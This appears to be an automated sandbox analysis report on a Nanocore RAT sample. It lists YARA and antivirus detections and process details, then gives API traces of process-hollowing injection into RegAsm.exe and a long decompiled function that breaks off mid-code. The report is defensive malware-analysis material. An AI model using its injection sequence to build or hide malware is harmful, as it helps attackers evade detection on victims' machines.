Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000E.00000003.581083346.0000000003668000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000003.581083346.0000000003668000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000E.00000003.581083346.0000000003668000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000E.00000003.580718643.0000000003611000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000003.580718643.0000000003611000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000E.00000003.580718643.0000000003611000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000E.00000002.614749797.00000000016E2000.00000040.00020000.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000002.614749797.00000000016E2000.00000040.00020000.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000E.00000002.614749797.00000000016E2000.00000040.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000E.00000003.580844038.0000000003B80000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000003.580844038.0000000003B80000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000E.00000003.580844038.0000000003B80000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000E.00000003.592051979.0000000003562000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000003.592051979.0000000003562000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000E.00000003.592051979.0000000003562000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000E.00000003.580617027.00000000035B9000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000003.580617027.00000000035B9000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000E.00000003.580617027.00000000035B9000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000E.00000003.580586671.000000000369C000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000003.580586671.000000000369C000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000E.00000003.580586671.000000000369C000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000E.00000003.580975519.000000000363C000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000E.00000003.580975519.000000000363C000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000E.00000003.580975519.000000000363C000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Antivirus matches:	Detection: 100%, Avira
Reputation:	low

Chronological Activities

Analysis Process: RegAsm.exe PID: 7040 Parent PID: 6788

General

Start time:	13:57:59
Start date:	15/09/2021
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
Imagebase:	0x9d0000
File size:	53248 bytes
MD5 hash:	529695608EAFBED00ACA9E61EF333A7C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000016.00000002.611459498.0000000003081000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000016.00000002.611459498.0000000003081000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000016.00000002.609719074.0000000000402000.00000040.00020000.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000016.00000002.609719074.0000000000402000.00000040.00020000.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000016.00000002.609719074.0000000000402000.00000040.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000016.00000002.611621495.0000000004081000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000016.00000002.611621495.0000000004081000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: wIQLBHYbqz.exe PID: 4904 Parent PID: 5288 wIQLBHYbqz.exeCOMMON

Executed Functions

Function 01411C68, Relevance: 15.2, APIs: 10, Instructions: 225nativethreadprocessCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,0800000C,00000000,00000000,?,?), ref: 01411D16
NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,00000000), ref: 01411D3B
NtReadVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 01411D55
NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 01411DA0
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 01411DC5
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 01411E08
NtWriteVirtualMemory.NTDLL(?,?,?,00000004,?), ref: 01411E95
NtGetContextThread.NTDLL(?,?), ref: 01411EAF
NtSetContextThread.NTDLL(?,00010007), ref: 01411ED3
NtResumeThread.NTDLL(?,00000000), ref: 01411EE5

Memory Dump Source

Source File: 00000000.00000003.468417124.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false

Similarity

API ID: SectionThread$ContextCreateMemoryProcessViewVirtual$InformationQueryReadResumeWrite
String ID:
API String ID: 3307612235-0
Opcode ID: 96ae76fc365d5c28d7c28a07cf9a8eaef0a1b5bf8692d1917c9822d9dabbaf16
Instruction ID: e1d1577f5f44edf2a2c4f5c409ef05067387e8aa6b7c45259c1de9afc453d9e7
Opcode Fuzzy Hash: 96ae76fc365d5c28d7c28a07cf9a8eaef0a1b5bf8692d1917c9822d9dabbaf16
Instruction Fuzzy Hash: 9B91F471900249AFDF21DFA5CC88EEEBBB9FF49B05F404059FA09EA150D731AA45CB60

Uniqueness

Uniqueness Score: -1.00%

Function 014100AD, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 92nativeCOMMON

Download Yara Rule

APIs

NtOpenSection.NTDLL(?,0000000C,?), ref: 01410199
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000001,00000000,00000002), ref: 014101B8

Strings

wcsl, xrefs: 01410149
NtOpenSection, xrefs: 0141011D, 01410120
@, xrefs: 0141018C
NtMapViewOfSectionNtOpenSection, xrefs: 01410128, 0141012B
en, xrefs: 01410150

Memory Dump Source

Source File: 00000000.00000003.468417124.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false

Similarity

API ID: Section$OpenView
String ID: @$NtMapViewOfSectionNtOpenSection$NtOpenSection$en$wcsl
API String ID: 2380476227-2634024955
Opcode ID: ca8d08bbda82312d277e41b8cb719b15daffc38e68cad09b1ab1bebb54b543c8
Instruction ID: f1676ad880c65639ab6d628b979d1e81461fd6eb4e63d66fce55423c44d6eedf
Opcode Fuzzy Hash: ca8d08bbda82312d277e41b8cb719b15daffc38e68cad09b1ab1bebb54b543c8
Instruction Fuzzy Hash: 9C3155B1D00218EFCB10DFE4D881ADEBBB8FF08754F20401AE500EB254E7759A05CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0040FE40, Relevance: 9.8, APIs: 3, Strings: 2, Instructions: 1040COMMON

Download Yara Rule

Strings

%I, xrefs: 0040FE53
prL, xrefs: 00444DE3

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: BuffCharUpper
String ID: prL$%I
API String ID: 3964851224-581522409
Opcode ID: 983e54858409f94cc92895e3f7af79fac18b0638f7df901281241494819cd159
Instruction ID: a3b9221dc64c310c941b5016b295edb8af427260a8d4055f717b05a0858251c0
Opcode Fuzzy Hash: 983e54858409f94cc92895e3f7af79fac18b0638f7df901281241494819cd159
Instruction Fuzzy Hash: B7926C706083419FD720DF15C580B6BB7E1BF84304F14896EE8969B392D7B9EC85CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040E800, Relevance: 7.4, Strings: 5, Instructions: 1102COMMON

Download Yara Rule

Strings

DtL, xrefs: 0040EC21
DtL, xrefs: 00443F58
DtL, xrefs: 0040EC1A
DtL, xrefs: 00443F1F
Variable must be of type 'Object'., xrefs: 0044428C

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: DtL$DtL$DtL$DtL$Variable must be of type 'Object'.
API String ID: 0-814274700
Opcode ID: 85a31858a845d484e0de4a91c8b1fe27da12605106f46967e14e26dcbcba627a
Instruction ID: 646285330f24ea673303868bc9691634490c9c151704f09186753778590e683b
Opcode Fuzzy Hash: 85a31858a845d484e0de4a91c8b1fe27da12605106f46967e14e26dcbcba627a
Instruction Fuzzy Hash: 88A28C74A04205CFDB24CF59C480AAAB7B1FF48304F24847AE916BB391D739EC56CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00463E91, Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00463EB6
Process32FirstW.KERNEL32(00000000,?), ref: 00463EC4
Process32NextW.KERNEL32(00000000,?), ref: 00463EE4
FindCloseChangeNotification.KERNELBASE(00000000), ref: 00463F8E

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
String ID:
API String ID: 3243318325-0
Opcode ID: 8aa7ecf2ff70b85f009610505a865043d03e6f3036c7cbb2acc8c27c13a2a556
Instruction ID: bc57a40dc23490dc388bdabf7fd9d7894261e16e4d08916f741d4787c1592c25
Opcode Fuzzy Hash: 8aa7ecf2ff70b85f009610505a865043d03e6f3036c7cbb2acc8c27c13a2a556
Instruction Fuzzy Hash: B731C2715083419FD304EF21C885AAFBBF8EF99344F10093EF481921A1EB75AA49CB57

Uniqueness

Uniqueness Score: -1.00%

Function 0040E060, Relevance: 3.5, APIs: 2, Instructions: 539COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e2fdc5ce43907da824cd70d46e637b4e99929fd9d78c8d05744a28ec67afa89
Instruction ID: 717d1ab0d90b391ed1eaae52652e6e1fa3a898975f929f0a44a13a0e96a5ed75
Opcode Fuzzy Hash: 2e2fdc5ce43907da824cd70d46e637b4e99929fd9d78c8d05744a28ec67afa89
Instruction Fuzzy Hash: 0822A170A00215DFDB24DF55C480AAEBBF0FF04304F14887BE956AB391D778A995CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00410B30, Relevance: 64.3, APIs: 27, Strings: 9, Instructions: 1300
windowsleeptimeCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00410B30(void* __ebx, void* __ecx, void* __fp0, signed int _a4) {
				struct tagMSG _v32;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v68;
				char _v72;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v120;
				char _v124;
				char _v128;
				int _v136;
				struct HWND__* _v140;
				struct HWND__* _v148;
				int _v152;
				struct HWND__* _v156;
				struct HWND__* _v164;
				signed int _v168;
				char _v172;
				char _v176;
				char _v180;
				int* _v192;
				struct tagMSG _v216;
				int _v224;
				intOrPtr _v228;
				int _v232;
				struct HWND__* _v236;
				signed int _v240;
				struct HWND__* _v244;
				struct HWND__* _v248;
				signed int _v256;
				char _v257;
				void* _v260;
				struct HWND__* _v264;
				intOrPtr _v268;
				int _v272;
				signed int _v276;
				char _v280;
				signed int _v284;
				signed int _v288;
				long _v292;
				void* _v296;
				long _v300;
				void* _v304;
				int _v312;
				void* _v316;
				struct HWND__* _v320;
				void* _v324;
				signed int _v328;
				signed int _v332;
				char _v333;
				intOrPtr _v336;
				void* _v340;
				signed int _v344;
				intOrPtr _v352;
				long _v356;
				struct HWND__* _v364;
				void* __edi;
				intOrPtr _t473;
				signed int _t475;
				intOrPtr _t476;
				void* _t477;
				intOrPtr _t478;
				void* _t484;
				void* _t490;
				signed int _t492;
				int _t494;
				long _t495;
				void* _t498;
				void* _t520;
				int _t536;
				short* _t541;
				int* _t542;
				void** _t543;
				void* _t549;
				intOrPtr _t577;
				void _t578;
				void* _t587;
				intOrPtr _t594;
				void _t595;
				int _t598;
				void* _t599;
				void* _t600;
				void* _t602;
				signed int _t608;
				int _t609;
				signed int _t613;
				intOrPtr _t619;
				signed int _t621;
				void* _t630;
				void* _t636;
				int _t644;
				intOrPtr _t647;
				intOrPtr _t648;
				intOrPtr _t649;
				intOrPtr _t650;
				intOrPtr _t652;
				signed int _t655;
				intOrPtr* _t656;
				intOrPtr _t658;
				intOrPtr _t659;
				int _t674;
				signed int _t675;
				void* _t689;
				int _t690;
				long _t691;
				void* _t703;
				void* _t704;
				long _t707;
				short _t708;
				void* _t709;
				void* _t712;
				void* _t733;
				void* _t740;
				void* _t741;
				void* _t747;
				signed int _t764;
				void* _t769;
				signed int _t778;
				void* _t795;
				signed int _t798;
				void* _t799;
				void* _t802;
				intOrPtr _t805;
				void* _t806;
				signed int _t838;
				void* _t839;
				void* _t843;
				void* _t846;
				long _t848;
				void* _t849;
				intOrPtr _t850;
				intOrPtr _t851;
				long _t852;
				signed int _t857;
				void* _t863;
				signed int _t864;
				void* _t866;
				intOrPtr* _t867;
				void* _t868;
				int* _t869;
				void* _t870;
				signed int _t873;
				signed int _t874;
				signed int _t876;
				signed int _t877;
				intOrPtr* _t879;
				intOrPtr _t881;
				signed int _t882;
				void* _t884;
				void* _t921;

				_t931 = __fp0;
				_t747 = __ebx;
				_t884 = (_t882 & 0xfffffff8) - 0x160;
				_t846 = __ecx;
				_v296 = __ecx;
				_t473 =  *((intOrPtr*)(__ecx + 0xec));
				if(_t473 >= 0xed8) {
					 *0x4c6280 = 0;
					_t475 = E0046A0B5(__ecx, __fp0, 0x9a, 0xffffffff) | 0xffffffff;
					L56:
					return _t475;
				}
				_t476 = _t473 + 1;
				 *((intOrPtr*)(__ecx + 0xec)) = _t476;
				if(_t476 == 1) {
					L90:
					_t477 =  *(__ecx + 0x11c);
					_v300 = _t477;
					while(1) {
						__eflags = _t477;
						if(__eflags == 0) {
							goto L2;
						}
						_t741 = E00409FBD(_t846,  *_t477);
						__eflags = _t741;
						if(_t741 != 0) {
							__eflags =  *((intOrPtr*)(_t741 + 0x10)) + 1;
							E004568BF(_t846, _t837, _t931,  *((intOrPtr*)(_t741 + 0x10)) + 1, 1);
						}
						_t752 =  &_v300;
						E00456CEA(_t752,  &_v292);
						_t477 = _v304;
					}
				}
				L2:
				 *((char*)(_t846 + 0x144)) = 0;
				if( *((char*)(_t846 + 0xfc)) != 0) {
					L53:
					_t478 =  *((intOrPtr*)(_t846 + 0xec));
					 *((char*)(_t846 + 0x144)) = 0;
					if(_t478 == 1) {
						E004111D0(_t846);
						__eflags =  *((char*)(_t846 + 0xfc)) - 1;
						if(__eflags == 0) {
							L55:
							_t475 = 0;
							goto L56;
						}
						E004111F3(_t846, _t837, __eflags, _t931);
						LockWindowUpdate(0);
						DestroyWindow( *0x4c62ac);
						_t484 = GetMessageW( &_v32, 0, 0, 0);
						__eflags = _t484;
						if(_t484 <= 0) {
							goto L55;
						}
						do {
							TranslateMessage( &_v32);
							DispatchMessageW( &_v32);
							_t490 = GetMessageW( &_v32, 0, 0, 0);
							__eflags = _t490;
						} while (_t490 > 0);
						goto L55;
					}
					 *((intOrPtr*)(_t846 + 0xec)) = _t478 - 1;
					goto L55;
				} else {
					while(1) {
						_t837 = 2;
						if( *((char*)(_t846 + 0x144)) != 0) {
							goto L53;
						}
						if( *0x4c6281 != 0) {
							__eflags =  *((char*)(_t846 + 0x145));
							if(__eflags == 0) {
								L11:
								if( *0x4c74a8 != 0) {
									_t492 =  *0x4c74ac; // 0x0
									_t857 =  *(_t492 + 4);
									_v356 =  *_t492;
									L0042106C(_t492);
									 *0x4c74a8 =  *0x4c74a8 - 1;
									_t884 = _t884 + 4;
									 *0x4c74ac = _t857;
									asm("sbb esi, esi");
									_t752 = 0;
									 *0x4c74b0 =  *0x4c74b0 &  ~_t857;
									_t837 =  *(_t846 + 0x1c8);
									_v340 = 0;
									__eflags = _t837;
									if(_t837 == 0) {
										L125:
										__eflags = _t752 - _t837;
										if(__eflags == 0) {
											_t837 = 2;
											goto L12;
										}
										_t733 = E00409FBD(_t846,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t846 + 0x1c4)) + _t752 * 4)))) + 8);
										E004081A7(_t846 + 0x14c,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t846 + 0x1c4)) + _v344 * 4)))) + 0x18);
										_t752 = _t846;
										E0040B89C(_t752, _t837, _t931,  *((intOrPtr*)(_t733 + 0x10)) + 1, 1, 0);
										L51:
										L52:
										if( *((char*)(_t846 + 0xfc)) == 0) {
											continue;
										}
										goto L53;
									}
									_t881 =  *((intOrPtr*)(_t846 + 0x1c4));
									_t852 = _v356;
									do {
										_t740 =  *( *(_t881 + _t752 * 4));
										__eflags = _t740;
										if(_t740 == 0) {
											goto L123;
										}
										__eflags =  *_t740 - _t852;
										if( *_t740 == _t852) {
											break;
										}
										L123:
										_t752 = _t752 + 1;
										__eflags = _t752 - _t837;
									} while (_t752 < _t837);
									_t846 = _v296;
									_v340 = _t752;
									goto L125;
								}
								L12:
								if( *0x4c6287 == 1) {
									__eflags =  *0x4c6281;
									if(__eflags != 0) {
										goto L13;
									}
									Sleep(0xa);
									goto L52;
								}
								L13:
								if( *((intOrPtr*)(_t846 + 0x454)) == 0 ||  *0x4c741c != 0) {
									L22:
									if( *0x4c67bc == 0 ||  *((char*)(_t846 + 0x458)) == 1) {
										L32:
										if( *((intOrPtr*)(_t846 + 0x184)) != 0) {
											__eflags =  *((char*)(_t846 + 0x484)) - 1;
											if(__eflags == 0) {
												goto L33;
											}
											 *((char*)(_t846 + 0x484)) = 1;
											_v264 = 0;
											_v180 = 0x48fb84;
											_v344 = 0;
											_v176 = 0;
											_v172 = 0;
											_v168 = 0;
											E00469C9F( &_v128, _t846,  *((intOrPtr*)(_t846 + 0x188)));
											E0045D9E3(_t846 + 0x184);
											_t871 = _v128;
											_v232 = 0;
											E00409997(E00409AC0(_t747,  &_v240,  *_v128), _t747,  *((intOrPtr*)(_t871 + 4)));
											_t837 = E00409FBD(_t846,  *((intOrPtr*)( *((intOrPtr*)(_t871 + 4)) + 8)));
											_v344 = _t837;
											_t764 =  *(_t837 + 0x10);
											_t520 = E004071C8(_t764);
											 *(_t846 + 0xf4) = _t764;
											_t873 = 3;
											__eflags =  *(_t837 + 0x14);
											_v320 = _t520;
											if( *(_t837 + 0x14) <= 0) {
												L174:
												E00408561(_t837,  *(_t837 + 0x10));
												_t874 = 3;
												_v292 = 3;
												_v344 = 1;
												__eflags =  *((intOrPtr*)(_v336 + 0x14)) - 1;
												if(__eflags < 0) {
													L215:
													E00407F41(_t747,  &_v48, __eflags, L"@COM_EVENTOBJ");
													__eflags = _v228 - 6;
													E00408620(_t846,  &_v52, (0 | _v228 != 0x00000006) - 0x00000001 & _v240, 0, 1);
													E00405A64( &_v68);
													E0040B89C(_t846, _t837, _t931,  *((intOrPtr*)(_v352 + 0x10)) + 1, 0, 0);
													E0040843F(_t747, 0x4c7280);
													_t769 = _v260;
													__eflags = _t769;
													if(_t769 != 0) {
														E00407B3D(_t769, _t769);
														_v232 = 0;
													}
													_t536 = _v224;
													__eflags = _t536 - 5;
													if(__eflags < 0) {
														L253:
														_v224 = 1;
														_v236 = 0;
														E004566F4( &_v128);
														_t752 =  &_v180;
														E004566F4(_t752);
														 *((char*)(_t846 + 0x484)) = 0;
														goto L51;
													} else {
														_t608 = _t536 + 0xfffffffb;
														__eflags = _t608 - 0xa;
														if(__eflags > 0) {
															goto L253;
														}
														switch( *((intOrPtr*)(_t608 * 4 +  &M004460E5))) {
															case 0:
																__eflags = __esi;
																if(__eflags != 0) {
																	__ecx = __esi;
																	__eax = E00408E34(__ecx, __edi, __eflags, __ecx);
																}
																goto L253;
															case 1:
																goto L253;
															case 2:
																__eflags = __esi;
																if(__eflags == 0) {
																	goto L253;
																}
																_push(__esi);
																__imp__#9();
																goto L252;
															case 3:
																__eflags = __esi;
																if(__eflags == 0) {
																	goto L253;
																}
																__ecx = __esi + 8;
																goto L251;
															case 4:
																__eax = L0042106C( *((intOrPtr*)(__esi + 4)));
																goto L252;
															case 5:
																__eflags = __esi;
																if(__eflags != 0) {
																	__ecx = __esi;
																	__eax = E004573F0(__ecx, __ecx);
																}
																goto L253;
															case 6:
																__eflags = __esi;
																if(__eflags == 0) {
																	goto L253;
																}
																__ecx = __esi;
																L251:
																__eax = E00405A64(__ecx);
																L252:
																__eax = L0042106C(__esi);
																goto L253;
															case 7:
																__eflags = __esi;
																if(__eflags != 0) {
																	__ecx = __esi;
																	__eax = E00457405(__ebx, __ecx, __edi, __ecx);
																}
																goto L253;
														}
													}
												} else {
													goto L175;
												}
												do {
													L175:
													_t838 = 0;
													_v256 = 0;
													_t798 =  *(_v304 + 4);
													_v356 = _t798;
													_t619 =  *((intOrPtr*)(_t798 + _t874 * 4));
													__eflags =  *(_t619 + 8);
													if( *(_t619 + 8) != 0) {
														L182:
														_t848 = _v356;
														_t839 = 4 + _t874 * 4;
														_v328 = 1;
														_t799 = 0;
														__eflags = 0;
														_t876 = _v328;
														while(1) {
															_t621 =  *( *((intOrPtr*)(_t839 + _t848)) + 8) & 0x0000ffff;
															__eflags = _t621 - 0x47;
															if(_t621 != 0x47) {
																goto L185;
															}
															L184:
															_t799 = _t799 + 1;
															L196:
															_t876 = _t876 + 1;
															_t839 = _t839 + 4;
															_t621 =  *( *((intOrPtr*)(_t839 + _t848)) + 8) & 0x0000ffff;
															__eflags = _t621 - 0x47;
															if(_t621 != 0x47) {
																goto L185;
															}
															goto L184;
															L185:
															__eflags = _t621 - 0x48;
															if(_t621 != 0x48) {
																__eflags = _t621 - 0x40;
																if(_t621 != 0x40) {
																	goto L196;
																}
																__eflags = _t799;
																if(_t799 == 0) {
																	L187:
																	_t846 = _v296;
																	_t837 = _v256;
																	_v328 = _t876;
																	_t876 = _v288;
																	__eflags = _v340 - _v264;
																	if(_v340 <= _v264) {
																		__eflags = _t837;
																		E00408620(_t846,  *((intOrPtr*)( *((intOrPtr*)(_v356 + _t876 * 4)))),  *_v344, _t837, 1);
																		goto L214;
																	}
																	_v324 = 0;
																	_v356 = _t876 + 2;
																	_v316 = 0;
																	_v312 = 1;
																	_t636 = E0040A000(_t747, _t846, _t931, _v304,  &_v356,  &_v324, _v328 + _t876);
																	__eflags = _t636;
																	if(_t636 < 0) {
																		_t795 = _v316;
																		__eflags = _t795;
																		if(_t795 != 0) {
																			E00407B3D(_t795, _t795);
																			_v320 = 0;
																		}
																		_t609 = _v312;
																		__eflags = _t609 - 5;
																		if(_t609 < 5) {
																			L171:
																			_v312 = 1;
																			_v324 = 0;
																			L172:
																			E00409DF0(_t747,  &_v236);
																			E004566F4( &_v128);
																			_t752 =  &_v180;
																			E004566F4(_t752);
																			 *((char*)(_t846 + 0x484)) = 0;
																			goto L33;
																		} else {
																			_t613 = _t609 + 0xfffffffb;
																			__eflags = _t613 - 0xa;
																			if(_t613 > 0xa) {
																				goto L171;
																			}
																			switch( *((intOrPtr*)(_t613 * 4 +  &M00446111))) {
																				case 0:
																					__ecx = _v324;
																					__eflags = __ecx;
																					if(__eflags != 0) {
																						__eax = E00408E34(__ecx, __edi, __eflags, __ecx);
																					}
																					goto L171;
																				case 1:
																					goto L171;
																				case 2:
																					_t614 = _v324;
																					__eflags = _t614;
																					if(_t614 == 0) {
																						goto L171;
																					}
																					_push(_t614);
																					__imp__#9();
																					_push(_v328);
																					goto L170;
																				case 3:
																					__esi = _v324;
																					__eflags = __esi;
																					if(__esi == 0) {
																						goto L171;
																					}
																					_t353 = __esi + 8; // 0x8
																					__ecx = _t353;
																					goto L169;
																				case 4:
																					_v324 = L0042106C( *((intOrPtr*)(_v324 + 4)));
																					_push(_v324);
																					goto L170;
																				case 5:
																					__ecx = _v324;
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = E004573F0(__ecx, __ecx);
																					}
																					goto L171;
																				case 6:
																					__esi = _v324;
																					__eflags = __esi;
																					if(__esi == 0) {
																						goto L171;
																					}
																					__ecx = __esi;
																					L169:
																					__eax = E00405A64(__ecx);
																					_push(__esi);
																					L170:
																					L0042106C();
																					_t884 = _t884 + 4;
																					goto L171;
																				case 7:
																					__ecx = _v324;
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = E00457405(__ebx, __ecx, __edi, __ecx);
																					}
																					goto L171;
																			}
																		}
																	}
																	E00408620(_t846,  *((intOrPtr*)( *((intOrPtr*)( *(_v304 + 4) + _t876 * 4)))),  &_v324, _v256 | 0x00000200, 1);
																	_t799 = _v332;
																	__eflags = _t799;
																	if(_t799 != 0) {
																		E00407B3D(_t799, _t799);
																		_v320 = 0;
																	}
																	_t644 = _v312;
																	__eflags = _t644 - 5;
																	if(_t644 < 5) {
																		L212:
																		_v312 = 1;
																		_v324 = 0;
																		goto L214;
																	} else {
																		_t621 = _t644 + 0xfffffffb;
																		__eflags = _t621 - 0xa;
																		if(_t621 > 0xa) {
																			goto L212;
																		}
																		switch( *((intOrPtr*)(_t621 * 4 +  &M004460B9))) {
																			case 0:
																				__ecx = _v324;
																				__eflags = __ecx;
																				if(__eflags != 0) {
																					__eax = E00408E34(__ecx, __edi, __eflags, __ecx);
																				}
																				goto L212;
																			case 1:
																				goto L212;
																			case 2:
																				__eax = _v324;
																				__eflags = __eax;
																				if(__eax == 0) {
																					goto L212;
																				}
																				_push(__eax);
																				__imp__#9();
																				_push(_v328);
																				goto L211;
																			case 3:
																				__eax = _v324;
																				_v356 = __eax;
																				__eflags = __eax;
																				if(__eax == 0) {
																					goto L212;
																				}
																				_t307 = __eax + 8; // 0x8
																				__ecx = _t307;
																				goto L210;
																			case 4:
																				_v324 = L0042106C( *((intOrPtr*)(_v324 + 4)));
																				_push(_v324);
																				goto L211;
																			case 5:
																				__ecx = _v324;
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = E004573F0(__ecx, __ecx);
																				}
																				goto L212;
																			case 6:
																				__eax = _v324;
																				_v356 = __eax;
																				__eflags = __eax;
